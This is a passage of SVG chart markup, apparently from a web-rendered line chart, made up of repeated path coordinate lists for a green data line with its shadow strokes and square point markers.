15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.0216457142857 L 88.86423054070113 252.3215465142857 L 90.83986928104575 246.49829622857143 L 92.81550802139039 245.70670765714286 L 94.791146761735 245.70670765714286 L 96.76678550207963 245.70670765714286 L 98.74242424242425 245.70670765714286 L 100.71806298276887 245.70670765714286 L 102.69370172311349 245.70670765714286 L 104.66934046345811 245.70670765714286 L 106.64497920380273 245.70670765714286 L 108.62061794414737 245.70670765714286 L 110.59625668449199 243.22411337142856 L 112.57189542483661 242.20494308571426 L 114.54753416518123 239.15245577142858 L 116.52317290552585 237.0699689142857 L 118.49881164587048 235.61512045714284 L 120.4744503862151 235.00985965714284 L 122.45008912655972 235.00985965714284 L 124.42572786690435 235.00985965714284 L 126.40136660724897 235.00985965714284 L 128.3770053475936 235.00985965714284 L 130.35264408793822 235.00985965714284 L 132.32828282828285 235.00985965714284 L 134.3039215686275 235.00985965714284 L 136.2795603089721 235.00985965714284 L 138.25519904931673 235.00985965714284 L 140.23083778966134 235.00985965714284 L 142.20647653000597 235.00985965714284 L 144.18211527035058 235.00985965714284 L 146.15775401069521 234.13251565714285 L 148.13339275103985 233.24842285714286 L 150.10903149138446 232.4887008 L 152.0846702317291 232.4887008 L 154.0603089720737 232.36306656 L 156.03594771241833 232.36306656 L 158.01158645276294 232.25004192 L 159.98722519310758 232.25004192 L 161.96286393345218 232.25004192 L 163.93850267379682 232.25004192 L 165.91414141414145 232.25004192 L 167.88978015448606 231.99744397714284 L 169.8654188948307 231.77402035809467 L 171.8410576351753 231.77402035809467 L 173.81669637551994 231.65858035809467 L 175.79233511586455 231.65858035809467 L 177.76797385620918 231.65858035809467 L 179.74361259655382 231.65858035809467 L 181.71925133689842 231.65858035809467 L 183.69489007724306 231.65858035809467 L 185.67052881758767 231.65858035809467 L 187.6461675579323 231.65858035809467 L 189.6218062982769 231.65858035809467 L 191.59744503862154 231.65858035809467 L 193.57308377896615 231.65858035809467 L 195.5487225193108 227.81364184380897 L 197.52436125965542 226.82232938666607 L 199.50000000000003 226.82232938666607 L 201.47563874034466 222.56943521523755 L 203.45127748068927 214.74925052952324 L 205.4269162210339 214.74925052952324 L 207.4025549613785 214.74925052952324 L 209.37819370172315 214.74925052952324 L 211.35383244206778 214.74925052952324 L 213.3294711824124 214.74925052952324 L 215.30510992275703 214.74925052952324 L 217.28074866310163 214.74925052952324 L 219.25638740344627 209.93832024380896 L 221.23202614379088 209.93832024380896 L 223.2076648841355 209.93832024380896 L 225.18330362448012 209.93832024380896 L 227.15894236482475 209.93832024380896 L 229.1345811051694 208.19327338666608 L 231.110219845514 208.19327338666608 L 233.08585858585863 208.19327338666608 L 235.06149732620324 208.19327338666608 L 237.03713606654787 208.19327338666608 L 239.01277480689248 208.19327338666608 L 240.98841354723712 200.0571129295232 L 242.96405228758175 187.5987773866661 L 244.93969102792636 174.19226081523752 L 246.915329768271 169.12101967238038 L 248.8909685086156 169.12101967238038 L 250.86660724896024 160.01013967238038 L 252.84224598930484 160.01013967238038 L 254.81788472964945 160.01013967238038 L 256.79352346999406 160.01013967238038 L 258.7691622103387 160.01013967238038 L 260.7448009506833 160.01013967238038 L 262.72043969102793 160.01013967238038 L 264.69607843137254 160.01013967238038 L 266.6717171717172 160.01013967238038 L 268.6473559120618 160.01013967238038 L 270.6229946524064 160.01013967238038 L 272.598633392751 159.50759932952323 L 274.5742721330957 159.50759932952323 L 276.5499108734403 159.50759932952323 L 278.5255496137849 159.50759932952323 L 280.50118835412957 159.50759932952323 L 282.4768270944742 159.50759932952323 L 284.4524658348188 159.50759932952323 L 286.4281045751634 159.50759932952323 L 288.40374331550805 159.50759932952323 L 290.37938205585266 159.50759932952323 L 292.35502079619727 159.50759932952323 L 294.33065953654193 159.50759932952323 L 296.30629827688654 159.50759932952323 L 298.28193701723114 159.50759932952323 L 300.25757575757575 159.50759932952323 L 302.2332144979204 159.50759932952323 L 304.208853238265 158.2384189866661 L 306.1844919786096 158.2384189866661 L 308.1601307189543 158.2384189866661 L 310.1357694592989 158.2384189866661 L 312.1114081996435 158.2384189866661 L 314.0870469399881 158.2384189866661 L 316.0626856803328 158.2384189866661 L 318.0383244206774 158.2384189866661 L 320.013963161022 158.2384189866661 L 321.98960190136665 158.2384189866661 L 323.96524064171126 158.2384189866661 L 325.94087938205587 158.2384189866661 L 327.9165181224005 158.2384189866661 L 329.89215686274514 158.2384189866661 L 331.86779560308975 158.2384189866661 L 333.84343434343435 158.2384189866661 L 335.81907308377896 158.2384189866661 L 337.7947118241236 158.2384189866661 L 339.77035056446823 158.2384189866661 L 341.74598930481284 158.1886909866661 L 343.7216280451575 158.1886909866661 L 345.6972667855021 158.1886909866661 L 347.6729055258467 158.1886909866661 L 349.6485442661913 158.1886909866661 L 351.624183006536 158.1886909866661 L 353.5998217468806 158.1886909866661 L 355.5754604872252 158.1886909866661 L 357.55109922756986 158.1886909866661 L 359.52673796791447 158.1886909866661 L 361.5023767082591 158.1886909866661 L 363.4780154486037 158.1886909866661 L 365.45365418894835 158.1886909866661 L 367.42929292929296 158.1886909866661 L 369.40493166963756 158.1886909866661 L 371.3805704099822 158.1886909866661 L 373.35620915032683 158.1886909866661 L 375.33184789067144 158.1886909866661 L 377.30748663101605 158.1886909866661 L 379.2831253713607 158.1886909866661 L 381.2587641117053 158.1886909866661 L 383.2344028520499 158.1886909866661 L 385.2100415923946 158.1886909866661 L 387.1856803327392 158.1886909866661 L 389.1613190730838 158.1886909866661 L 391.1369578134284 148.4569213866661 L 393.1125965537731 132.4217725866661 L 395.0882352941177 132.4217725866661" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.0216457142857 L 88.86423054070113 252.3215465142857 L 90.83986928104575 246.49829622857143 L 92.81550802139039 245.70670765714286 L 94.791146761735 245.70670765714286 L 96.76678550207963 245.70670765714286 L 98.74242424242425 245.70670765714286 L 100.71806298276887 245.70670765714286 L 102.69370172311349 245.70670765714286 L 104.66934046345811 245.70670765714286 L 106.64497920380273 245.70670765714286 L 108.62061794414737 245.70670765714286 L 110.59625668449199 243.22411337142856 L 112.57189542483661 242.20494308571426 L 114.54753416518123 239.15245577142858 L 116.52317290552585 237.0699689142857 L 118.49881164587048 235.61512045714284 L 120.4744503862151 235.00985965714284 L 122.45008912655972 235.00985965714284 L 124.42572786690435 235.00985965714284 L 126.40136660724897 235.00985965714284 L 128.3770053475936 235.00985965714284 L 130.35264408793822 235.00985965714284 L 132.32828282828285 235.00985965714284 L 134.3039215686275 235.00985965714284 L 136.2795603089721 235.00985965714284 L 138.25519904931673 235.00985965714284 L 140.23083778966134 235.00985965714284 L 142.20647653000597 235.00985965714284 L 144.18211527035058 235.00985965714284 L 146.15775401069521 234.13251565714285 L 148.13339275103985 233.24842285714286 L 150.10903149138446 232.4887008 L 152.0846702317291 232.4887008 L 154.0603089720737 232.36306656 L 156.03594771241833 232.36306656 L 158.01158645276294 232.25004192 L 159.98722519310758 232.25004192 L 161.96286393345218 232.25004192 L 163.93850267379682 232.25004192 L 165.91414141414145 232.25004192 L 167.88978015448606 231.99744397714284 L 169.8654188948307 231.77402035809467 L 171.8410576351753 231.77402035809467 L 173.81669637551994 231.65858035809467 L 175.79233511586455 231.65858035809467 L 177.76797385620918 231.65858035809467 L 179.74361259655382 231.65858035809467 L 181.71925133689842 231.65858035809467 L 183.69489007724306 231.65858035809467 L 185.67052881758767 231.65858035809467 L 187.6461675579323 231.65858035809467 L 189.6218062982769 231.65858035809467 L 191.59744503862154 231.65858035809467 L 193.57308377896615 231.65858035809467 L 195.5487225193108 227.81364184380897 L 197.52436125965542 226.82232938666607 L 199.50000000000003 226.82232938666607 L 201.47563874034466 222.56943521523755 L 203.45127748068927 214.74925052952324 L 205.4269162210339 214.74925052952324 L 207.4025549613785 214.74925052952324 L 209.37819370172315 214.74925052952324 L 211.35383244206778 214.74925052952324 L 213.3294711824124 214.74925052952324 L 215.30510992275703 214.74925052952324 L 217.28074866310163 214.74925052952324 L 219.25638740344627 209.93832024380896 L 221.23202614379088 209.93832024380896 L 223.2076648841355 209.93832024380896 L 225.18330362448012 209.93832024380896 L 227.15894236482475 209.93832024380896 L 229.1345811051694 208.19327338666608 L 231.110219845514 208.19327338666608 L 233.08585858585863 208.19327338666608 L 235.06149732620324 208.19327338666608 L 237.03713606654787 208.19327338666608 L 239.01277480689248 208.19327338666608 L 240.98841354723712 200.0571129295232 L 242.96405228758175 187.5987773866661 L 244.93969102792636 174.19226081523752 L 246.915329768271 169.12101967238038 L 248.8909685086156 169.12101967238038 L 250.86660724896024 160.01013967238038 L 252.84224598930484 160.01013967238038 L 254.81788472964945 160.01013967238038 L 256.79352346999406 160.01013967238038 L 258.7691622103387 160.01013967238038 L 260.7448009506833 160.01013967238038 L 262.72043969102793 160.01013967238038 L 264.69607843137254 160.01013967238038 L 266.6717171717172 160.01013967238038 L 268.6473559120618 160.01013967238038 L 270.6229946524064 160.01013967238038 L 272.598633392751 159.50759932952323 L 274.5742721330957 159.50759932952323 L 276.5499108734403 159.50759932952323 L 278.5255496137849 159.50759932952323 L 280.50118835412957 159.50759932952323 L 282.4768270944742 159.50759932952323 L 284.4524658348188 159.50759932952323 L 286.4281045751634 159.50759932952323 L 288.40374331550805 159.50759932952323 L 290.37938205585266 159.50759932952323 L 292.35502079619727 159.50759932952323 L 294.33065953654193 159.50759932952323 L 296.30629827688654 159.50759932952323 L 298.28193701723114 159.50759932952323 L 300.25757575757575 159.50759932952323 L 302.2332144979204 159.50759932952323 L 304.208853238265 158.2384189866661 L 306.1844919786096 158.2384189866661 L 308.1601307189543 158.2384189866661 L 310.1357694592989 158.2384189866661 L 312.1114081996435 158.2384189866661 L 314.0870469399881 158.2384189866661 L 316.0626856803328 158.2384189866661 L 318.0383244206774 158.2384189866661 L 320.013963161022 158.2384189866661 L 321.98960190136665 158.2384189866661 L 323.96524064171126 158.2384189866661 L 325.94087938205587 158.2384189866661 L 327.9165181224005 158.2384189866661 L 329.89215686274514 158.2384189866661 L 331.86779560308975 158.2384189866661 L 333.84343434343435 158.2384189866661 L 335.81907308377896 158.2384189866661 L 337.7947118241236 158.2384189866661 L 339.77035056446823 158.2384189866661 L 341.74598930481284 158.1886909866661 L 343.7216280451575 158.1886909866661 L 345.6972667855021 158.1886909866661 L 347.6729055258467 158.1886909866661 L 349.6485442661913 158.1886909866661 L 351.624183006536 158.1886909866661 L 353.5998217468806 158.1886909866661 L 355.5754604872252 158.1886909866661 L 357.55109922756986 158.1886909866661 L 359.52673796791447 158.1886909866661 L 361.5023767082591 158.1886909866661 L 363.4780154486037 158.1886909866661 L 365.45365418894835 158.1886909866661 L 367.42929292929296 158.1886909866661 L 369.40493166963756 158.1886909866661 L 371.3805704099822 158.1886909866661 L 373.35620915032683 158.1886909866661 L 375.33184789067144 158.1886909866661 L 377.30748663101605 158.1886909866661 L 379.2831253713607 158.1886909866661 L 381.2587641117053 158.1886909866661 L 383.2344028520499 158.1886909866661 L 385.2100415923946 158.1886909866661 L 387.1856803327392 158.1886909866661 L 389.1613190730838 158.1886909866661 L 391.1369578134284 148.4569213866661 L 393.1125965537731 132.4217725866661 L 395.0882352941177 132.4217725866661" fill="none" stroke="rgb(0, 0, 0)" stroke-width="3" isShadow="true" stroke-opacity="0.1" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.0216457142857 L 88.86423054070113 252.3215465142857 L 90.83986928104575 246.49829622857143 L 92.81550802139039 245.70670765714286 L 94.791146761735 245.70670765714286 L 96.76678550207963 245.70670765714286 L 98.74242424242425 245.70670765714286 L 100.71806298276887 245.70670765714286 L 102.69370172311349 245.70670765714286 L 104.66934046345811 245.70670765714286 L 106.64497920380273 245.70670765714286 L 108.62061794414737 245.70670765714286 L 110.59625668449199 243.22411337142856 L 112.57189542483661 242.20494308571426 L 114.54753416518123 239.15245577142858 L 116.52317290552585 237.0699689142857 L 118.49881164587048 235.61512045714284 L 120.4744503862151 235.00985965714284 L 122.45008912655972 235.00985965714284 L 124.42572786690435 235.00985965714284 L 126.40136660724897 235.00985965714284 L 128.3770053475936 235.00985965714284 L 130.35264408793822 235.00985965714284 L 132.32828282828285 235.00985965714284 L 134.3039215686275 235.00985965714284 L 136.2795603089721 235.00985965714284 L 138.25519904931673 235.00985965714284 L 140.23083778966134 235.00985965714284 L 142.20647653000597 235.00985965714284 L 144.18211527035058 235.00985965714284 L 146.15775401069521 234.13251565714285 L 148.13339275103985 233.24842285714286 L 150.10903149138446 232.4887008 L 152.0846702317291 232.4887008 L 154.0603089720737 232.36306656 L 156.03594771241833 232.36306656 L 158.01158645276294 232.25004192 L 159.98722519310758 232.25004192 L 161.96286393345218 232.25004192 L 163.93850267379682 232.25004192 L 165.91414141414145 232.25004192 L 167.88978015448606 231.99744397714284 L 169.8654188948307 231.77402035809467 L 171.8410576351753 231.77402035809467 L 173.81669637551994 231.65858035809467 L 175.79233511586455 231.65858035809467 L 177.76797385620918 231.65858035809467 L 179.74361259655382 231.65858035809467 L 181.71925133689842 231.65858035809467 L 183.69489007724306 231.65858035809467 L 185.67052881758767 231.65858035809467 L 187.6461675579323 231.65858035809467 L 189.6218062982769 231.65858035809467 L 191.59744503862154 231.65858035809467 L 193.57308377896615 231.65858035809467 L 195.5487225193108 227.81364184380897 L 197.52436125965542 226.82232938666607 L 199.50000000000003 226.82232938666607 L 201.47563874034466 222.56943521523755 L 203.45127748068927 214.74925052952324 L 205.4269162210339 214.74925052952324 L 207.4025549613785 214.74925052952324 L 209.37819370172315 214.74925052952324 L 211.35383244206778 214.74925052952324 L 213.3294711824124 214.74925052952324 L 215.30510992275703 214.74925052952324 L 217.28074866310163 214.74925052952324 L 219.25638740344627 209.93832024380896 L 221.23202614379088 209.93832024380896 L 223.2076648841355 209.93832024380896 L 225.18330362448012 209.93832024380896 L 227.15894236482475 209.93832024380896 L 229.1345811051694 208.19327338666608 L 231.110219845514 208.19327338666608 L 233.08585858585863 208.19327338666608 L 235.06149732620324 208.19327338666608 L 237.03713606654787 208.19327338666608 L 239.01277480689248 208.19327338666608 L 240.98841354723712 200.0571129295232 L 242.96405228758175 187.5987773866661 L 244.93969102792636 174.19226081523752 L 246.915329768271 169.12101967238038 L 248.8909685086156 169.12101967238038 L 250.86660724896024 160.01013967238038 L 252.84224598930484 160.01013967238038 L 254.81788472964945 160.01013967238038 L 256.79352346999406 160.01013967238038 L 258.7691622103387 160.01013967238038 L 260.7448009506833 160.01013967238038 L 262.72043969102793 160.01013967238038 L 264.69607843137254 160.01013967238038 L 266.6717171717172 160.01013967238038 L 268.6473559120618 160.01013967238038 L 270.6229946524064 160.01013967238038 L 272.598633392751 159.50759932952323 L 274.5742721330957 159.50759932952323 L 276.5499108734403 159.50759932952323 L 278.5255496137849 159.50759932952323 L 280.50118835412957 159.50759932952323 L 282.4768270944742 159.50759932952323 L 284.4524658348188 159.50759932952323 L 286.4281045751634 159.50759932952323 L 288.40374331550805 159.50759932952323 L 290.37938205585266 159.50759932952323 L 292.35502079619727 159.50759932952323 L 294.33065953654193 159.50759932952323 L 296.30629827688654 159.50759932952323 L 298.28193701723114 159.50759932952323 L 300.25757575757575 159.50759932952323 L 302.2332144979204 159.50759932952323 L 304.208853238265 158.2384189866661 L 306.1844919786096 158.2384189866661 L 308.1601307189543 158.2384189866661 L 310.1357694592989 158.2384189866661 L 312.1114081996435 158.2384189866661 L 314.0870469399881 158.2384189866661 L 316.0626856803328 158.2384189866661 L 318.0383244206774 158.2384189866661 L 320.013963161022 158.2384189866661 L 321.98960190136665 158.2384189866661 L 323.96524064171126 158.2384189866661 L 325.94087938205587 158.2384189866661 L 327.9165181224005 158.2384189866661 L 329.89215686274514 158.2384189866661 L 331.86779560308975 158.2384189866661 L 333.84343434343435 158.2384189866661 L 335.81907308377896 158.2384189866661 L 337.7947118241236 158.2384189866661 L 339.77035056446823 158.2384189866661 L 341.74598930481284 158.1886909866661 L 343.7216280451575 158.1886909866661 L 345.6972667855021 158.1886909866661 L 347.6729055258467 158.1886909866661 L 349.6485442661913 158.1886909866661 L 351.624183006536 158.1886909866661 L 353.5998217468806 158.1886909866661 L 355.5754604872252 158.1886909866661 L 357.55109922756986 158.1886909866661 L 359.52673796791447 158.1886909866661 L 361.5023767082591 158.1886909866661 L 363.4780154486037 158.1886909866661 L 365.45365418894835 158.1886909866661 L 367.42929292929296 158.1886909866661 L 369.40493166963756 158.1886909866661 L 371.3805704099822 158.1886909866661 L 373.35620915032683 158.1886909866661 L 375.33184789067144 158.1886909866661 L 377.30748663101605 158.1886909866661 L 379.2831253713607 158.1886909866661 L 381.2587641117053 158.1886909866661 L 383.2344028520499 158.1886909866661 L 385.2100415923946 158.1886909866661 L 387.1856803327392 158.1886909866661 L 389.1613190730838 158.1886909866661 L 391.1369578134284 148.4569213866661 L 393.1125965537731 132.4217725866661 L 395.0882352941177 132.4217725866661" fill="none" stroke="rgb(0, 0, 0)" stroke-width="1" isShadow="true" stroke-opacity="0.15000000000000002" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.0216457142857 L 88.86423054070113 252.3215465142857 L 90.83986928104575 246.49829622857143 L 92.81550802139039 245.70670765714286 L 94.791146761735 245.70670765714286 L 96.76678550207963 245.70670765714286 L 98.74242424242425 245.70670765714286 L 100.71806298276887 245.70670765714286 L 102.69370172311349 245.70670765714286 L 104.66934046345811 245.70670765714286 L 106.64497920380273 245.70670765714286 L 108.62061794414737 245.70670765714286 L 110.59625668449199 243.22411337142856 L 112.57189542483661 242.20494308571426 L 114.54753416518123 239.15245577142858 L 116.52317290552585 237.0699689142857 L 118.49881164587048 235.61512045714284 L 120.4744503862151 235.00985965714284 L 122.45008912655972 235.00985965714284 L 124.42572786690435 235.00985965714284 L 126.40136660724897 235.00985965714284 L 128.3770053475936 235.00985965714284 L 130.35264408793822 235.00985965714284 L 132.32828282828285 235.00985965714284 L 134.3039215686275 235.00985965714284 L 136.2795603089721 235.00985965714284 L 138.25519904931673 235.00985965714284 L 140.23083778966134 235.00985965714284 L 142.20647653000597 235.00985965714284 L 144.18211527035058 235.00985965714284 L 146.15775401069521 234.13251565714285 L 148.13339275103985 233.24842285714286 L 150.10903149138446 232.4887008 L 152.0846702317291 232.4887008 L 154.0603089720737 232.36306656 L 156.03594771241833 232.36306656 L 158.01158645276294 232.25004192 L 159.98722519310758 232.25004192 L 161.96286393345218 232.25004192 L 163.93850267379682 232.25004192 L 165.91414141414145 232.25004192 L 167.88978015448606 231.99744397714284 L 169.8654188948307 231.77402035809467 L 171.8410576351753 231.77402035809467 L 173.81669637551994 231.65858035809467 L 175.79233511586455 231.65858035809467 L 177.76797385620918 231.65858035809467 L 179.74361259655382 231.65858035809467 L 181.71925133689842 231.65858035809467 L 183.69489007724306 231.65858035809467 L 185.67052881758767 231.65858035809467 L 187.6461675579323 231.65858035809467 L 189.6218062982769 231.65858035809467 L 191.59744503862154 231.65858035809467 L 193.57308377896615 231.65858035809467 L 195.5487225193108 227.81364184380897 L 197.52436125965542 226.82232938666607 L 199.50000000000003 226.82232938666607 L 201.47563874034466 222.56943521523755 L 203.45127748068927 214.74925052952324 L 205.4269162210339 214.74925052952324 L 207.4025549613785 214.74925052952324 L 209.37819370172315 214.74925052952324 L 211.35383244206778 214.74925052952324 L 213.3294711824124 214.74925052952324 L 215.30510992275703 214.74925052952324 L 217.28074866310163 214.74925052952324 L 219.25638740344627 209.93832024380896 L 221.23202614379088 209.93832024380896 L 223.2076648841355 209.93832024380896 L 225.18330362448012 209.93832024380896 L 227.15894236482475 209.93832024380896 L 229.1345811051694 208.19327338666608 L 231.110219845514 208.19327338666608 L 233.08585858585863 208.19327338666608 L 235.06149732620324 208.19327338666608 L 237.03713606654787 208.19327338666608 L 239.01277480689248 208.19327338666608 L 240.98841354723712 200.0571129295232 L 242.96405228758175 187.5987773866661 L 244.93969102792636 174.19226081523752 L 246.915329768271 169.12101967238038 L 248.8909685086156 169.12101967238038 L 250.86660724896024 160.01013967238038 L 252.84224598930484 160.01013967238038 L 254.81788472964945 160.01013967238038 L 256.79352346999406 160.01013967238038 L 258.7691622103387 160.01013967238038 L 260.7448009506833 160.01013967238038 L 262.72043969102793 160.01013967238038 L 264.69607843137254 160.01013967238038 L 266.6717171717172 160.01013967238038 L 268.6473559120618 160.01013967238038 L 270.6229946524064 160.01013967238038 L 272.598633392751 159.50759932952323 L 274.5742721330957 159.50759932952323 L 276.5499108734403 159.50759932952323 L 278.5255496137849 159.50759932952323 L 280.50118835412957 159.50759932952323 L 282.4768270944742 159.50759932952323 L 284.4524658348188 159.50759932952323 L 286.4281045751634 159.50759932952323 L 288.40374331550805 159.50759932952323 L 290.37938205585266 159.50759932952323 L 292.35502079619727 159.50759932952323 L 294.33065953654193 159.50759932952323 L 296.30629827688654 159.50759932952323 L 298.28193701723114 159.50759932952323 L 300.25757575757575 159.50759932952323 L 302.2332144979204 159.50759932952323 L 304.208853238265 158.2384189866661 L 306.1844919786096 158.2384189866661 L 308.1601307189543 158.2384189866661 L 310.1357694592989 158.2384189866661 L 312.1114081996435 158.2384189866661 L 314.0870469399881 158.2384189866661 L 316.0626856803328 158.2384189866661 L 318.0383244206774 158.2384189866661 L 320.013963161022 158.2384189866661 L 321.98960190136665 158.2384189866661 L 323.96524064171126 158.2384189866661 L 325.94087938205587 158.2384189866661 L 327.9165181224005 158.2384189866661 L 329.89215686274514 158.2384189866661 L 331.86779560308975 158.2384189866661 L 333.84343434343435 158.2384189866661 L 335.81907308377896 158.2384189866661 L 337.7947118241236 158.2384189866661 L 339.77035056446823 158.2384189866661 L 341.74598930481284 158.1886909866661 L 343.7216280451575 158.1886909866661 L 345.6972667855021 158.1886909866661 L 347.6729055258467 158.1886909866661 L 349.6485442661913 158.1886909866661 L 351.624183006536 158.1886909866661 L 353.5998217468806 158.1886909866661 L 355.5754604872252 158.1886909866661 L 357.55109922756986 158.1886909866661 L 359.52673796791447 158.1886909866661 L 361.5023767082591 158.1886909866661 L 363.4780154486037 158.1886909866661 L 365.45365418894835 158.1886909866661 L 367.42929292929296 158.1886909866661 L 369.40493166963756 158.1886909866661 L 371.3805704099822 158.1886909866661 L 373.35620915032683 158.1886909866661 L 375.33184789067144 158.1886909866661 L 377.30748663101605 158.1886909866661 L 379.2831253713607 158.1886909866661 L 381.2587641117053 158.1886909866661 L 383.2344028520499 158.1886909866661 L 385.2100415923946 158.1886909866661 L 387.1856803327392 158.1886909866661 L 389.1613190730838 158.1886909866661 L 391.1369578134284 148.4569213866661 L 393.1125965537731 132.4217725866661 L 395.0882352941177 132.4217725866661" fill="none" stroke="#55BF3B" stroke-width="2"></path><path d="M 392.172 129.672 L 397.828 129.672 397.828 135.328 392.172 135.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 390.172 129.672 L 395.828 129.672 395.828 135.328 390.172 135.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 388.172 145.672 L 393.828 145.672 393.828 151.328 388.172 151.328 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 386.172 155.172 L 391.828 155.172 391.828 160.828 386.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 384.172 155.172 L 389.828 155.172 389.828 160.828 384.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 382.172 155.172 L 387.828 155.172 387.828 160.828 382.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 380.172 155.172 L 385.828 155.172 385.828 160.828 380.172 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 378.672 155.172 L 384.328 155.172 384.328 160.828 378.672 160.828 Z" fill="#55BF3B" stroke="#333" stroke-width="0.000001"></path><path d="M 376.672 155.172 L 382.328 155.172 382.328 160.828 376.672 160.828 Z" fill="#55BF3B" stroke="#333" 